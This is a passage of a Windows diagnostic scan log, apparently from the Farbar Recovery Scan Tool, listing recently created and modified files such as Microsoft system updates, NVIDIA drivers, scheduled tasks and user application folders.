2017-12-13 03:18 - 2017-12-08 05:54 - 001570816 _____ (Microsoft Corporation) C:\WINDOWS\system32\RecoveryDrive.exe
2017-12-13 03:18 - 2017-12-08 05:54 - 001160704 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2017-12-13 03:18 - 2017-11-27 04:35 - 017084416 _____ (Microsoft Corporation) C:\WINDOWS\system32\HologramCompositor.dll
2017-12-13 03:18 - 2017-11-27 04:32 - 021754368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Hydrogen.dll
2017-12-13 03:18 - 2017-11-27 04:15 - 000882688 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Mirage.Internal.dll
2017-12-13 03:18 - 2017-11-27 00:43 - 000618496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Mirage.Internal.dll
2017-12-13 03:18 - 2017-11-26 21:48 - 001200536 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2017-12-13 03:18 - 2017-11-26 21:47 - 001053592 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2017-12-13 03:18 - 2017-11-26 21:45 - 001642520 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d9.dll
2017-12-13 03:18 - 2017-11-26 21:45 - 000319352 _____ (Microsoft Corporation) C:\WINDOWS\system32\wow64.dll
2017-12-13 03:18 - 2017-11-26 21:45 - 000264040 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotifyIcon.exe
2017-12-13 03:18 - 2017-11-26 21:45 - 000198888 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2017-12-13 03:18 - 2017-11-26 21:41 - 000285080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys
2017-12-13 03:18 - 2017-11-26 21:38 - 001636376 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2017-12-13 03:18 - 2017-11-26 21:37 - 001277848 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2017-12-13 03:18 - 2017-11-26 21:35 - 001090440 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2017-12-13 03:18 - 2017-11-26 21:35 - 000924136 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2017-12-13 03:18 - 2017-11-26 21:33 - 002395032 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2017-12-13 03:18 - 2017-11-26 21:33 - 001208184 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2017-12-13 03:18 - 2017-11-26 21:33 - 000471960 _____ (Microsoft Corporation) C:\WINDOWS\system32\hal.dll
2017-12-13 03:18 - 2017-11-26 21:33 - 000398744 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fltMgr.sys
2017-12-13 03:18 - 2017-11-26 21:32 - 000373656 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\clfs.sys
2017-12-13 03:18 - 2017-11-26 21:32 - 000082840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\volmgr.sys
2017-12-13 03:18 - 2017-11-26 21:31 - 000187288 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys
2017-12-13 03:18 - 2017-11-26 21:30 - 001488792 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContentDeliveryManager.Utilities.dll
2017-12-13 03:18 - 2017-11-26 21:29 - 003010720 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d11.dll
2017-12-13 03:18 - 2017-11-26 21:29 - 002573208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2017-12-13 03:18 - 2017-11-26 21:29 - 000891800 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2017-12-13 03:18 - 2017-11-26 21:29 - 000840440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Perception.Stub.dll
2017-12-13 03:18 - 2017-11-26 21:29 - 000749976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2017-12-13 03:18 - 2017-11-26 21:29 - 000703536 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxgi.dll
2017-12-13 03:18 - 2017-11-26 21:29 - 000436120 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostCommon.dll
2017-12-13 03:18 - 2017-11-26 21:28 - 001259344 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2017-12-13 03:18 - 2017-11-26 21:28 - 001012120 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Services.TargetedContent.dll
2017-12-13 03:18 - 2017-11-26 21:28 - 000713624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vhdmp.sys
2017-12-13 03:18 - 2017-11-26 21:28 - 000495000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys
2017-12-13 03:18 - 2017-11-26 21:28 - 000149400 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storahci.sys
2017-12-13 03:18 - 2017-11-26 21:27 - 002446744 _____ (Microsoft Corporation) C:\WINDOWS\system32\UpdateAgent.dll
2017-12-13 03:18 - 2017-11-26 21:27 - 002412168 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6.dll
2017-12-13 03:18 - 2017-11-26 21:27 - 001413760 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2017-12-13 03:18 - 2017-11-26 21:27 - 000464408 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcryptprimitives.dll
2017-12-13 03:18 - 2017-11-26 21:27 - 000230296 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys
2017-12-13 03:18 - 2017-11-26 21:26 - 000428952 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rdbss.sys
2017-12-13 03:18 - 2017-11-26 21:26 - 000048112 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
2017-12-13 03:18 - 2017-11-26 21:25 - 000902416 _____ (Microsoft Corporation) C:\WINDOWS\system32\winhttp.dll
2017-12-13 03:18 - 2017-11-26 21:23 - 001694224 _____ (Microsoft Corporation) C:\WINDOWS\system32\winmde.dll
2017-12-13 03:18 - 2017-11-26 21:23 - 001054280 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvproc.dll
2017-12-13 03:18 - 2017-11-26 21:23 - 000754688 _____ (Microsoft Corporation) C:\WINDOWS\system32\evr.dll
2017-12-13 03:18 - 2017-11-26 21:22 - 000404888 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll
2017-12-13 03:18 - 2017-11-26 21:21 - 001585376 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2017-12-13 03:18 - 2017-11-26 21:21 - 000654048 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2017-12-13 03:18 - 2017-11-26 21:20 - 000615768 _____ (Microsoft Corporation) C:\WINDOWS\system32\services.exe
2017-12-13 03:18 - 2017-11-26 21:20 - 000519152 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecurityHealthService.exe
2017-12-13 03:18 - 2017-11-26 20:57 - 001664000 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll
2017-12-13 03:18 - 2017-11-26 20:55 - 001289216 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2017-12-13 03:18 - 2017-11-26 20:55 - 000329728 _____ (Microsoft Corporation) C:\WINDOWS\system32\AcGenral.dll
2017-12-13 03:18 - 2017-11-26 20:55 - 000301056 _____ (Microsoft Corporation) C:\WINDOWS\system32\AcLayers.dll
2017-12-13 03:18 - 2017-11-26 20:55 - 000211456 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotificationUx.exe
2017-12-13 03:18 - 2017-11-26 20:55 - 000175104 _____ (Microsoft Corporation) C:\WINDOWS\system32\t2embed.dll
2017-12-13 03:18 - 2017-11-26 20:55 - 000084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceUpdateAgent.dll
2017-12-13 03:18 - 2017-11-26 20:54 - 000327680 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2017-12-13 03:18 - 2017-11-26 20:54 - 000092160 _____ (Microsoft Corporation) C:\WINDOWS\system32\usoapi.dll
2017-12-13 03:18 - 2017-11-26 20:48 - 012829696 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2017-12-13 03:18 - 2017-11-26 20:47 - 002890240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll
2017-12-13 03:18 - 2017-11-26 20:43 - 000239104 _____ (Microsoft Corporation) C:\WINDOWS\system32\smartscreenps.dll
2017-12-13 03:18 - 2017-11-26 20:36 - 000204288 _____ (Microsoft Corporation) C:\WINDOWS\system32\provisioningcsp.dll
2017-12-13 03:18 - 2017-11-26 20:36 - 000169472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhosdeployment.dll
2017-12-13 03:18 - 2017-11-26 20:36 - 000168448 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_SIUF.dll
2017-12-13 03:18 - 2017-11-26 20:36 - 000041472 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vwifimp.sys
2017-12-13 03:18 - 2017-11-26 20:35 - 000170496 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_ContentDeliveryManager.dll
2017-12-13 03:18 - 2017-11-26 20:35 - 000057856 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuautoappupdate.dll
2017-12-13 03:18 - 2017-11-26 20:34 - 000126464 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptcatsvc.dll
2017-12-13 03:18 - 2017-11-26 20:33 - 000361984 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpatializerApo.dll
2017-12-13 03:18 - 2017-11-26 20:31 - 001495040 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2017-12-13 03:18 - 2017-11-26 20:31 - 000529408 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\nwifi.sys
2017-12-13 03:18 - 2017-11-26 20:31 - 000115200 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatepolicy.dll
2017-12-13 03:18 - 2017-11-26 20:31 - 000073216 _____ (Microsoft Corporation) C:\WINDOWS\system32\provtool.exe
2017-12-13 03:18 - 2017-11-26 20:29 - 000474112 _____ (Microsoft Corporation) C:\WINDOWS\system32\DictationManager.dll
2017-12-13 03:18 - 2017-11-26 20:29 - 000432640 _____ (Microsoft Corporation) C:\WINDOWS\system32\provengine.dll
2017-12-13 03:18 - 2017-11-26 20:29 - 000424960 _____ (Microsoft Corporation) C:\WINDOWS\system32\provhandlers.dll
2017-12-13 03:18 - 2017-11-26 20:29 - 000238080 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceSetupManager.dll
2017-12-13 03:18 - 2017-11-26 20:28 - 000394752 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ks.sys
2017-12-13 03:18 - 2017-11-26 20:26 - 000830464 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d9on12.dll
2017-12-13 03:18 - 2017-11-26 20:26 - 000770048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdiWiFi.sys
2017-12-13 03:18 - 2017-11-26 20:26 - 000432640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.LockScreen.dll
2017-12-13 03:18 - 2017-11-26 20:25 - 001425408 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.Handlers.dll
2017-12-13 03:18 - 2017-11-26 20:25 - 000516096 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActivationManager.dll
2017-12-13 03:18 - 2017-11-26 20:25 - 000354304 _____ (Microsoft Corporation) C:\WINDOWS\system32\WwaApi.dll
2017-12-13 03:18 - 2017-11-26 20:25 - 000292864 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExecModelClient.dll
2017-12-13 03:18 - 2017-11-26 20:25 - 000266752 _____ (Microsoft Corporation) C:\WINDOWS\system32\SIHClient.exe
2017-12-13 03:18 - 2017-11-26 20:23 - 000588288 _____ (Microsoft Corporation) C:\WINDOWS\system32\actxprxy.dll
2017-12-13 03:18 - 2017-11-26 20:22 - 000720896 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
2017-12-13 03:18 - 2017-11-26 20:19 - 001167360 _____ (Microsoft Corporation) C:\WINDOWS\system32\ISM.dll
2017-12-13 03:18 - 2017-11-26 20:19 - 000887296 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.dll
2017-12-13 03:18 - 2017-11-26 20:19 - 000059392 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadjcsp.dll
2017-12-13 03:18 - 2017-11-26 20:18 - 003186688 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.CloudStore.dll
2017-12-13 03:18 - 2017-11-26 20:18 - 001424896 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll
2017-12-13 03:18 - 2017-11-26 20:18 - 000556544 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppBroker.dll
2017-12-13 03:18 - 2017-11-26 20:17 - 003334144 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2017-12-13 03:18 - 2017-11-26 20:17 - 002208768 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2017-12-13 03:18 - 2017-11-26 20:17 - 001054720 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2017-12-13 03:18 - 2017-11-26 20:08 - 017159680 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2017-12-13 03:18 - 2017-11-26 20:05 - 000462336 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2017-12-13 03:18 - 2017-11-26 20:04 - 003578368 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll
2017-12-13 03:18 - 2017-11-26 20:04 - 002596352 _____ (Microsoft Corporation) C:\WINDOWS\system32\smartscreen.exe
2017-12-13 03:18 - 2017-11-26 20:03 - 004772352 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2017-12-13 03:18 - 2017-11-26 20:03 - 002783744 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2017-12-13 03:18 - 2017-11-26 20:01 - 003163648 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2017-12-13 03:18 - 2017-11-26 20:00 - 000899584 _____ (Microsoft Corporation) C:\WINDOWS\system32\samsrv.dll
2017-12-13 03:18 - 2017-11-26 19:59 - 004814848 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2017-12-13 03:18 - 2017-11-26 19:59 - 000726016 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys
2017-12-13 03:18 - 2017-11-26 19:59 - 000259072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srvnet.sys
2017-12-13 03:18 - 2017-11-26 19:58 - 000151040 _____ (Microsoft Corporation) C:\WINDOWS\system32\umpo.dll
2017-12-13 03:18 - 2017-11-26 19:48 - 000534528 _____ (Microsoft Corporation) C:\WINDOWS\system32\apphelp.dll
2017-12-13 03:18 - 2017-11-26 19:48 - 000079360 _____ (Microsoft Corporation) C:\WINDOWS\system32\acppage.dll
2017-12-13 03:18 - 2017-11-26 19:21 - 001474680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d9.dll
2017-12-13 03:18 - 2017-11-26 19:21 - 001432816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2017-12-13 03:18 - 2017-11-26 19:02 - 001124760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ContentDeliveryManager.Utilities.dll
2017-12-13 03:18 - 2017-11-26 19:01 - 002339296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d11.dll
2017-12-13 03:18 - 2017-11-26 19:01 - 000791960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe
2017-12-13 03:18 - 2017-11-26 19:01 - 000746904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Services.TargetedContent.dll
2017-12-13 03:18 - 2017-11-26 19:01 - 000590944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxgi.dll
2017-12-13 03:18 - 2017-11-26 19:01 - 000506256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Perception.Stub.dll
2017-12-13 03:18 - 2017-11-26 19:01 - 000354200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostCommon.dll
2017-12-13 03:18 - 2017-11-26 19:00 - 001990160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml6.dll
2017-12-13 03:18 - 2017-11-26 19:00 - 000353848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcryptprimitives.dll
2017-12-13 03:18 - 2017-11-26 18:59 - 000703568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winhttp.dll
2017-12-13 03:18 - 2017-11-26 18:58 - 001148216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2017-12-13 03:18 - 2017-11-26 18:58 - 001057824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvproc.dll
2017-12-13 03:18 - 2017-11-26 18:51 - 001558856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winmde.dll
2017-12-13 03:18 - 2017-11-26 18:51 - 000661664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\evr.dll
2017-12-13 03:18 - 2017-11-26 18:41 - 002393600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AcGenral.dll
2017-12-13 03:18 - 2017-11-26 18:41 - 001470976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll
2017-12-13 03:18 - 2017-11-26 18:41 - 000372224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AcLayers.dll
2017-12-13 03:18 - 2017-11-26 18:41 - 000133632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\t2embed.dll
2017-12-13 03:18 - 2017-11-26 18:41 - 000065536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\usoapi.dll
2017-12-13 03:18 - 2017-11-26 18:40 - 000160256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\smartscreenps.dll
2017-12-13 03:18 - 2017-11-26 18:38 - 000271872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SpatializerApo.dll
2017-12-13 03:18 - 2017-11-26 18:37 - 000098304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\updatepolicy.dll
2017-12-13 03:18 - 2017-11-26 18:36 - 013703168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2017-12-13 03:18 - 2017-11-26 18:36 - 000444928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActivationManager.dll
2017-12-13 03:18 - 2017-11-26 18:36 - 000351232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DictationManager.dll
2017-12-13 03:18 - 2017-11-26 18:36 - 000315392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.LockScreen.dll
2017-12-13 03:18 - 2017-11-26 18:35 - 000557056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d9on12.dll
2017-12-13 03:18 - 2017-11-26 18:35 - 000293888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WwaApi.dll
2017-12-13 03:18 - 2017-11-26 18:35 - 000261632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\actxprxy.dll
2017-12-13 03:18 - 2017-11-26 18:35 - 000242176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExecModelClient.dll
2017-12-13 03:18 - 2017-11-26 18:32 - 011923456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2017-12-13 03:18 - 2017-11-26 18:31 - 000660480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.dll
2017-12-13 03:18 - 2017-11-26 18:31 - 000456704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LockAppBroker.dll
2017-12-13 03:18 - 2017-11-26 18:30 - 004385280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2017-12-13 03:18 - 2017-11-26 18:30 - 002859520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRH.dll
2017-12-13 03:18 - 2017-11-26 18:29 - 002869760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2017-12-13 03:18 - 2017-11-26 18:29 - 000823808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2017-12-13 03:18 - 2017-11-26 18:28 - 004249600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2017-12-13 03:18 - 2017-11-26 18:24 - 000614912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apphelp.dll
2017-12-13 03:18 - 2017-11-26 18:24 - 000068096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\acppage.dll
2017-12-13 03:18 - 2017-11-19 15:35 - 003331520 _____ C:\WINDOWS\system32\Windows.Mirage.dll
2017-12-13 03:18 - 2017-11-19 10:20 - 002491112 _____ C:\WINDOWS\SysWOW64\Windows.Mirage.dll
2017-12-12 04:49 - 2017-12-17 07:07 - 000000068 _____ C:\Users\ouroboros\AppData\Local\HvpjdXLztn
2017-12-09 12:38 - 2017-12-09 12:38 - 001079535 _____ C:\Users\ouroboros\Downloads\Stats_May_6_Lesson_10-1.pdf
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2018-01-05 10:00 - 2017-05-07 21:52 - 000000000 ____D C:\ProgramData\NVIDIA
2018-01-05 09:58 - 2016-01-24 21:20 - 000000008 __RSH C:\ProgramData\ntuser.pol
2018-01-05 09:57 - 2017-11-13 12:23 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2018-01-05 09:57 - 2017-09-29 16:45 - 000786432 _____ C:\WINDOWS\system32\config\BBI
2018-01-05 09:56 - 2017-06-21 16:34 - 000000000 ____D C:\Users\ouroboros\AppData\LocalLow\Temp
2018-01-05 09:55 - 2017-09-29 21:46 - 000000000 ____D C:\WINDOWS\SysWOW64\GroupPolicy
2018-01-05 09:55 - 2015-07-10 19:04 - 000000000 ___HD C:\WINDOWS\system32\GroupPolicy
2018-01-05 09:46 - 2017-09-29 21:46 - 000000000 ____D C:\WINDOWS\DeliveryOptimization
2018-01-05 09:35 - 2017-11-13 12:23 - 000000000 ____D C:\WINDOWS\System32\Tasks\Intel
2018-01-05 09:35 - 2017-11-13 12:23 - 000000000 ____D C:\WINDOWS\System32\Tasks\ASUS
2018-01-05 09:35 - 2017-11-10 19:11 - 000000000 ____D C:\Users\ouroboros\AppData\Roaming\discord
2018-01-05 09:35 - 2017-10-29 17:59 - 000000000 ____D C:\Users\ouroboros\AppData\Roaming\qBittorrent
2018-01-05 09:35 - 2017-09-29 21:44 - 000000000 ____D C:\WINDOWS\INF
2018-01-05 09:35 - 2016-02-01 22:08 - 000000000 ____D C:\WINDOWS\SysWOW64\SupportAppPBHostless Modem
2018-01-05 09:35 - 2015-12-25 22:39 - 000000000 ____D C:\Users\ouroboros\AppData\Roaming\TS3Client
2018-01-05 09:35 - 2015-12-22 13:17 - 000000000 ____D C:\Users\ouroboros\AppData\Roaming\vlc
2018-01-05 09:35 - 2015-11-03 03:01 - 000000000 ___HD C:\WINDOWS\system32\WLANProfiles
2018-01-05 09:28 - 2017-09-29 21:46 - 000000000 ____D C:\WINDOWS\registration
2018-01-05 08:52 - 2017-09-29 21:46 - 000000000 ___HD C:\Program Files\WindowsApps
2018-01-05 08:52 - 2017-09-29 21:46 - 000000000 ____D C:\WINDOWS\AppReadiness
2018-01-05 08:51 - 2015-12-26 13:28 - 000000000 ____D C:\Users\ouroboros\AppData\Local\Adobe
2018-01-05 08:51 - 2015-12-21 08:04 - 000002495 _____ C:\Users\ouroboros\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2018-01-05 08:50 - 2017-11-13 12:23 - 000004176 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{6BD46CFB-E054-464B-ACE5-24C6D38691EC}
2018-01-05 08:45 - 2017-11-13 12:01 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2018-01-04 18:00 - 2017-09-29 21:37 - 000000000 ____D C:\WINDOWS\CbsTemp
2018-01-04 12:00 - 2017-11-13 12:23 - 000003550 _____ C:\WINDOWS\System32\Tasks\ASUS Live Update1
2018-01-04 12:00 - 2017-11-13 12:23 - 000003540 _____ C:\WINDOWS\System32\Tasks\ASUS Live Update2
2018-01-03 10:57 - 2017-11-13 12:06 - 000000000 ____D C:\Users\ouroboros
2018-01-03 10:34 - 2017-10-29 17:59 - 000000000 ____D C:\Users\ouroboros\AppData\Local\qBittorrent
2018-01-01 04:30 - 2017-09-29 21:46 - 000000000 ____D C:\WINDOWS\system32\NDF
2017-12-30 11:52 - 2016-09-25 13:58 - 000000000 ____D C:\Users\ouroboros\Documents\My Games
2017-12-22 12:43 - 2017-09-29 21:46 - 000000000 ____D C:\WINDOWS\rescache
2017-12-22 09:16 - 2016-01-01 09:22 - 000000000 ____D C:\Users\ouroboros\AppData\Local\UnrealEngine
2017-12-22 09:16 - 2015-11-03 02:48 - 000000000 ____D C:\ProgramData\Package Cache
2017-12-21 11:33 - 2017-05-07 21:52 - 000000000 ____D C:\ProgramData\NVIDIA Corporation
2017-12-21 11:32 - 2017-11-16 17:01 - 000004000 _____ C:\WINDOWS\System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-12-21 11:32 - 2017-11-13 12:23 - 000003940 _____ C:\WINDOWS\System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-12-21 11:31 - 2017-11-13 12:23 - 000004308 _____ C:\WINDOWS\System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-12-21 11:31 - 2017-11-13 12:23 - 000003894 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-12-21 11:31 - 2017-11-13 12:23 - 000003866 _____ C:\WINDOWS\System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-12-21 11:31 - 2017-11-13 12:23 - 000003858 _____ C:\WINDOWS\System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-12-21 11:31 - 2017-11-13 12:23 - 000003696 _____ C:\WINDOWS\System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-12-21 11:31 - 2017-11-13 12:23 - 000003654 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-12-21 11:31 - 2017-05-07 21:52 - 000000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2017-12-21 11:31 - 2017-05-07 21:51 - 000000000 ____D C:\Program Files\NVIDIA Corporation
2017-12-21 11:31 - 2016-01-18 16:53 - 000000000 ____D C:\Users\ouroboros\AppData\Roaming\NVIDIA
2017-12-21 10:13 - 2017-08-10 00:55 - 000000288 _____ C:\WINDOWS\Tasks\{447123AD-7416-1893-A863-7ED1A81B6B4D}.job
2017-12-19 08:26 - 2017-09-29 21:46 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2017-12-19 08:25 - 2017-09-29 21:46 - 000000000 ____D C:\Program Files\Common Files\microsoft shared
2017-12-19 08:23 - 2016-05-15 23:14 - 000000000 ____D C:\Program Files\Microsoft Office
2017-12-16 19:27 - 2017-11-10 19:11 - 000002259 _____ C:\Users\ouroboros\Desktop\Discord.lnk
2017-12-16 19:27 - 2017-11-10 19:11 - 000000000 ____D C:\Users\ouroboros\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord Inc
2017-12-16 19:27 - 2017-11-10 19:11 - 000000000 ____D C:\Users\ouroboros\AppData\Local\Discord
2017-12-16 08:23 - 2017-06-14 21:24 - 001615472 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvhdagenco6420103.dll
2017-12-16 08:23 - 2017-06-14 21:24 - 000225208 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvhda64v.sys
2017-12-16 08:23 - 2017-06-14 21:21 - 004485376 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvapi64.dll
2017-12-16 08:23 - 2017-06-14 18:09 - 000048442 _____ C:\WINDOWS\system32\nvinfo.pb
2017-12-16 08:23 - 2017-05-14 19:36 - 002404800 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspcap64.dll
2017-12-16 08:23 - 2017-05-14 19:36 - 002070976 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspcap.dll
2017-12-16 08:23 - 2017-05-14 19:36 - 001309120 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvRtmpStreamer64.dll
2017-12-16 08:23 - 2017-05-14 19:35 - 000001951 _____ C:\WINDOWS\NvTelemetryContainerRecovery.bat
